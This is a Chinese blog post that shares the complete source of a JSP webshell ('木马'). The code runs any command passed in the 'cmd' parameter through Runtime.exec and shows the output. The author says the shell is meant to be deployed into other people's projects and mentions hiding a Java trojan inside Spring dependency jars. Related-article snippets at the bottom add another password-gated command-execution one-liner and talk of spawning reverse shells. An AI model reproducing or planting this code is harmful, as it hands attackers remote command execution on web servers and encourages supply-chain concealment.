发一个 JSP 木马

最新推荐文章于 2024-05-30 07:27:36 发布
最新推荐文章于 2024-05-30 07:27:36 发布
阅读量4.8k 收藏 5
点赞数
CC 4.0 BY-SA版权
分类专栏: Java相关 文章标签: jsp cmd null exception string spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yang3wei/article/details/7627375

发一个大学时期在网上找到的 jsp 木马

怎么用?具体的不太清楚,但肯定要让别人部署到他们的项目中去。

而且,这个仅仅是一个草案。

更加完善的应该包括,隐藏,通知控制端,。。等等

以前写过一个 java 木马,我直接将木马模块给混在 spring 的依赖 jar 包里面了。

当然,我并没有去害过谁,我只是自己测试了一下,觉得蛮有意思的。

废话不多说,上代码:

<!--实现cmd功能的JSP小木马(作者:荔明奇(xgym))-->
<%@ page contentType="text/html;charset=gb2312"%>

<!--编码方式为gb2312(中文),否则会出现中文显示为乱码的情况-->
<%@ page import="java.io.*"%>
<!--引入java.io.*包文件,因为我们需要StringBuffer之类的I/O操作-->
<%
	//定义一个字符串变量strCmd_in,且这个变量是从cmd对象中获取到的值;request是JSP中内置的对象,用来获取对象的值。
	String strCmd_in = request.getParameter("cmd");

	//定义字符串初始值为空的变量myLine,myLine是我们在界面输入框中的命令
	String myLine = "";

	//定义一个Buffer,用来读取我们的输入框中的命令并返回结果
	StringBuffer strBufCmd = new StringBuffer("");

	//如果strCmd_in不为Null就执行
	if (strCmd_in != null)
	{ /* java非常先进的地方之一就是引入了异常处理机制(try/catch),这样调试程序就显得非常轻松了,而且我们编写出来的程序也安全了很多*/
		try
		{ //新建一个Process对象,利用Runtime执行(exec)获取到的命令,其实最主要的一句就是这个了,唯一最主要的方法了
			Process pro = Runtime.getRuntime().exec("cmd /c " + strCmd_in);

			//新建一个BufferedReader对象,用来读取我们输入的命令
			BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
			while ((myLine = buf.readLine()) != null)
			{
				//获取到的命令追加到变量myLine后面并换行
				strBufCmd.append(myLine + "\r\n");
			}
		}
		catch (Exception e)
		{
			//如果发生异常就打印出来
			System.out.println(e.toString());
		}
	}
	else
	{ //默认为我们的输入框中的命令
		strCmd_in = "net user";
	}
%>

<!--定义一个表单名称为cmd,method为post-->
<form name="cmd" action="" method="post">
	<!--空格-->
	<!--定义一个text类型的对象,用来做我们输入的框-->
	<input type="text" name="cmd" value="<%=strCmd_in%>" size=50>
	<!--提交我们的命令-->
	<input type=submit name=submit value="执行命令">
</form>
<%
	if (strBufCmd != null && strBufCmd.toString().trim().equals("") == false)
	{
%>
<!--空格-->
<!--定义一个TEXTAREA类型的返回界面框,默认是20列-->
<TEXTAREA NAME="MyView" ROWS="20" COLS="100%"><%=strBufCmd.toString()%></TEXTAREA>
<br>
<!--空格-->
<%
	}
%>

 

java jsp 木马_JSP安全开之XSS漏洞详解
weixin_39991055的博客
12-21 629
前言大家好,好男人就是我,我就是好男人,我就是-0nise。在各大漏洞举报平台,我们时常会看到XSS漏洞。那么问题来了,为何会出现这种漏洞?出现这种漏洞应该怎么修复?正文1.XSS?XSS?XSS是什么鬼?XSS又叫跨站脚本攻击(Cross Site Scripting),我不会告诉他原本是叫CSS的,但是为了不和我们所用的层叠样式表(Cascading Style Sheets)CSS搞混。CS...
jsp 不解析pre_Jsp 小后门,Jsp 一句话木马后门详解
weixin_42146230的博客
01-13 844
一:执行系统命令:无回显执行系统命令:请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,用来反弹个shell很方便。有回显带密码验证的:if("023".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec...
JSP大马文件
08-13
jsp 木马, 放到网站可以访问的目录, 访问页面,即可管理服务器内容.切勿用于非法用途
漂亮的JSP木马
背着小书包一路追寻梦想
07-06 4812
&lt;%@ page contentType="text/html; charset=utf-8"%&gt; &lt;%@ page import="java.io.*"%&gt; &lt;%@ page import="java.util.*"%&gt; &lt;%@ page import="java.nio.charset.Charset"%&gt; &am
JSP 木马
seawavecau的专栏
11-11 4370
一款不错的 JSP 木马。大家复制下面的内容。然后另存为 JSP 格式就可以拉。private String _password = "520520";private String _encodeType = "GB2312";private int _sessionOutTime = 20;private String[] _textFileTypes = {"txt", "htm", "h
jsp木马jshell
zzg810314
06-13 1063
 一款不错的jsp木马,jshell最近现修改版很多,而且功能也强大了好多。 首先介绍一下如何上载这款jsp木马,现在的jsp应用大多以tomcat布,tomcat默认有两个管理应用,分别是admin和manager/html,如果在软件布的时候没有更改密码或删除应用,就会造成很大的安全隐患,例如这两个应用的默认密码都为空,登录manager后,可以创建上传context应用,如果我们把这款...
vue jsp木马
04-01
还有用户提到的一句话木马,可能通过文件上传漏洞植入,所以在JSP中处理上传时要特别小心。 需要确保回答中覆盖Vue和JSP各自的安全问题,以及具体的防护措施,同时结合用户给的引用内容。可能的问题包括:Vue如何...
jsp木马 json格式
最新发布
06-27
以下是一个模拟的JSON格式示例,表示一个JSP木马的基本结构: ```json { "malware": { "type": "jsp_webshell", "name": "example_jsp_shell", "description": "A basic JSP webshell that executes system ...
jsp文件木马代码分析
长颈鹿的专栏
03-26 4075
近来登陆阿里云,竟现webapps/ROOT/下面多了一个tst.jsp 代码格式化了一下,每个方法都注释了下 <%!String Pwd = "chopper"; String EC(String s, String c) throws Exception { return s; }//new String(s.getBytes("ISO-8859-1"),c);} //
jsp 木马
qqpedily的专栏
04-22 548
JSP木马程序
fsdi0254qingyun的专栏
01-16 4083
一款不错的 JSP 木马。大家复制下面的内容。然后另存为 JSP 格式就可以拉。private String _password = "520520";private String _encodeType = "GB2312";private int _sessionOutTime = 20;private String[] _textFileTypes = {"txt", "htm", "h
weblogic快速传jsp木马
weixin_48776804的博客
06-13 2154
weblogic快速传jsp木马
java安全——jsp一句话木马
Innocence_0的博客
05-30 2101
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方优快云官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的话可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
JSP一句话木马
热门推荐
我的
12-11 2万+
JSP一句话木马  2011-01-13 21:39:42|  分类: 网络技巧 |  标签:jsp  木马  |字号大中小 订阅 1》jsp页面代码 if(req[wiki]UE[/wiki]st.getParameter("f")!=null)(new java.io.FileOutputStream(application.get
服务器被上传jsp木马
u013894638的博客
08-25 1553
有个老项目最近安全监测比较严,又双叒叕接到经理的任务,说某项目的图片文件夹里多了两个木马,让找下原因和更改办法。 吧木马代码复制一段放到百度搜一下,大多指向strut2漏洞,但查看了项目jar包都已经改成2.3.15.1了应该不存在漏洞问题, 然后在360网站进行认领监测得了98分,没有检测出漏洞问题(此刻对360的能力失去了信心),然后就找漏洞工具测啊测, 也没测出个因为所以。最后查看木马
jsp资源管理器也可能是木马
开心的穷下去
12-17 164
tomcat防范:1.       删除webapps下所有文件夹2.       修改conf/tomcat-users.xml   去掉里面用户,如下: Xml代码 &lt;?xml version='1.0' encoding='utf-8'?&gt;   &lt;tomcat-users&gt;   &lt;/tomcat-users&gt;   ...
JSP写一句话木马
03-28
### JSP一句话木马的实现方法及原理 #### 方法概述 JSP(JavaServer Pages)是一种动态网页技术,允许开者嵌入Java代码到HTML页面中。通过利用JSP的功能特性,可以编写一句话木马来执行恶意命令。通常情况下,这种木马会接收来自客户端的一个特定参数作为指令输入,并将其传递给操作系统进行处理。 以下是基于提供的参考资料构建的一种简单形式: ```jsp <% if ("123".equals(request.getParameter("pwd"))) { java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while ((a = in.read(b)) != -1) { out.println(new String(b, 0, a)); } out.print("</pre>"); } %> ``` 上述代码片段展示了如何创建一个基本的JSP一句话木马[^2]。当请求中的`pwd`参数值等于预设密码字符串时,服务器端脚本将尝试运行由另一个参数`i`指定的操作系统命令并返回其输出结果。 #### 原理分析 该机制主要依赖于以下几个方面的工作流程: 1. **条件判断**: 验证传来的HTTP GET/POST 请求是否携带合法的身份验证密钥(`pwd`)。 2. **命令注入**: 如果身份验证成功,则进一步解析第二个参数(`i`)的内容视为待执行的具体Shell命令语句。 3. **进程调用**: 使用 `Runtime.exec()` 函数启动新的子程序去实际完成这些外部调用动作。 4. **数据流管理**: 将标准输出重定向回浏览器显示出来以便查看效果;同时注意关闭资源释放内存占用等问题。 整个过程中涉及到敏感权限操作以及跨平台兼容性的考量等因素都需要特别关注安全性风险评估环节[^3]。 #### 安全警示 需要注意的是,部署此类文件可能带来严重的安全隐患,包括但不限于完全控制目标主机的风险。因此仅限研究学习用途,请勿非法使用! ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值